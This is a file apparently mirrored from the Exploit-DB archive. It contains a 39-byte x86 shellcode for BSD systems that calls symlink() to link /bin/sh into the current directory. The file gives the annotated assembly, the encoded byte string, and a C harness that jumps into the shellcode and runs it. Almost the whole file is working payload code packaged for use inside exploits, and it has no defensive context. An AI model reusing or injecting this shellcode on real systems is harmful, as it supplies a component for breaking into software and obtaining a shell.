exploit-db-mirror/shellcodes/bsd_x86/43640.c
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

47 lines
No EOL
683 B
C

/*The shellcode calls the symlink() and makes the
link to the /bin/sh in the current dir.
size = 39 bytes
OS = *BSD
written by /rootteam/dev0id (rootteam.void.ru)
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
mov byte [esi+7],al
mov byte [esi+10],al
lea ebx,[esi+8]
push ebx
lea ebx,[esi]
push ebx
mov al,57
push eax
int 0x80
callme:
call main
db '/bin/sh#sh#'
*/
char shellcode[] =
"\xeb\x15\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x8d\x5e\x08\x53"
"\x8d\x1e\x53\xb0\x39\x50\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x23\x73\x68\x23";
int
main (void)
{
void (*code)(void);
code=(void(*)())shellcode;
(void)code();
return 0;
}